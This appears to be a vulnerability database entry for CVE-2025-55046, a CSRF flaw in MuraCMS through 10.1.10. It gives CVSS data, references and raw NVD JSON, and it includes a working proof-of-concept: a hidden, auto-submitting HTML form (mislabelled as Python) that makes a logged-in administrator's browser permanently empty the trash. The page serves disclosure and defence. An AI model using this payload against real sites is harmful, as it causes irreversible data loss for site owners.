CVE-2025-55046

Description

MuraCMS through 10.1.10 contains a CSRF vulnerability that allows attackers to permanently destroy all deleted content stored in the trash system through a simple CSRF attack. The vulnerable cTrash.empty function lacks CSRF token validation, enabling malicious websites to forge requests that irreversibly delete all trashed content when an authenticated administrator visits a crated webpage. Successful exploitation of the CSRF vulnerability results in potentially catastrophic data loss within the MuraCMS system. When an authenticated administrator visits a malicious page containing the CSRF exploit, their browser automatically submits a hidden form that permanently empties the entire trash system without any validation, confirmation dialog, or user consent.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:* - VULNERABLE

MuraCMS < 10.1.14

MuraCMS <= 10.1.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-55046: MuraCMS cTrash.empty CSRF -->
<!-- This PoC demonstrates how an attacker can permanently delete all trash content -->
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
    <style>body { display: none; }</style>
</head>
<body>
    <form id="csrfForm" action="https://target-site.com/admin/cTrash.empty" method="POST">
        <!-- MuraCMS cTrash.empty endpoint parameters -->
        <input type="hidden" name="method" value="empty" />
        <input type="hidden" name="siteid" value="default" />
        <input type="hidden" name="contentid" value="" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        
        // Optional: Redirect after exploitation
        setTimeout(function() {
            window.location.href = 'https://target-site.com/admin';
        }, 1000);
    </script>
</body>
</html>

<!-- 
Attack Scenario:
1. Attacker creates a malicious webpage with the CSRF PoC above
2. Attacker tricks an authenticated MuraCMS admin to visit the page
3. Admin's browser automatically sends POST request to cTrash.empty
4. Server executes empty operation without CSRF validation
5. All trashed content is permanently deleted

Required Conditions:
- Target must be running MuraCMS <= 10.1.10
- Admin must be logged in and have active session
- Admin must visit the attacker's malicious page
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55046
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55046
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55046/
[4] VulDB https://vuldb.com/cve/CVE-2025-55046
[5] https://docs.murasoftware.com/v10/release-notes/#section-version-1014
[6] https://www.murasoftware.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55046", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:23.790", "lastModified": "2026-03-20T18:10:09.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MuraCMS through 10.1.10 contains a CSRF vulnerability that allows attackers to permanently destroy all deleted content stored in the trash system through a simple CSRF attack. The vulnerable cTrash.empty function lacks CSRF token validation, enabling malicious websites to forge requests that irreversibly delete all trashed content when an authenticated administrator visits a crated webpage. Successful exploitation of the CSRF vulnerability results in potentially catastrophic data loss within the MuraCMS system. When an authenticated administrator visits a malicious page containing the CSRF exploit, their browser automatically submits a hidden form that permanently empties the entire trash system without any validation, confirmation dialog, or user consent."}, {"lang": "es", "value": "MuraCMS hasta la versión 10.1.10 contiene una vulnerabilidad CSRF que permite a los atacantes destruir permanentemente todo el contenido eliminado almacenado en el sistema de papelera a través de un simple ataque CSRF. La función vulnerable cTrash.empty carece de validación de token CSRF, lo que permite a sitios web maliciosos forjar solicitudes que eliminan irreversiblemente todo el contenido en la papelera cuando un administrador autenticado visita una página web creada. La explotación exitosa de la vulnerabilidad CSRF resulta en una pérdida de datos potencialmente catastrófica dentro del sistema MuraCMS. Cuando un administrador autenticado visita una página maliciosa que contiene el exploit CSRF, su navegador envía automáticamente un formulario oculto que vacía permanentemente todo el sistema de papelera sin ninguna validación, diálogo de confirmación o consentimiento del usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}]}}